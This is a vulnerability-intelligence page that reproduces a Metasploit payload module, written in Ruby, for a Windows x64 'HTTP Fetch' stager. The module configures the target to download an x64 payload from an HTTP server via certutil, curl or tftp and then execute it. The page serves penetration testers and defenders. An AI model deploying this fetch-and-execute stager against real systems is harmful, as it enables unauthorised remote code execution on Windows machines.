Lucene search

K

HTTP Fetch, Windows x64 IPv6 Bind TCP Stager

🗓️ 18 May 2023 15:29:47Reported by Brendan Watters, sf <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 157 Views

HTTP Fetch, Windows x64 IPv6 Bind TCP Stage

Show more
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
  include Msf::Payload::Adapter::Fetch::HTTP
  include Msf::Payload::Adapter::Fetch::WindowsOptions

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HTTP Fetch',
        'Description' => 'Fetch and execute an x64 payload from an HTTP server.',
        'DefaultOptions' => { 'FETCH_COMMAND' => 'CERTUTIL' },
        'Author' => 'Brendan Watters',
        'Platform' => 'win',
        'Arch' => ARCH_CMD,
        'License' => MSF_LICENSE,
        'AdaptedArch' => ARCH_X64,
        'AdaptedPlatform' => 'win'
      )
    )
    deregister_options('FETCH_COMMAND')
    register_options(
      [
        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CERTUTIL', %w[CURL TFTP CERTUTIL]])
      ]
    )
  end
end

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
18 May 2023 15:47Current
7.6High risk
Vulners AI Score7.6
157
.json
Report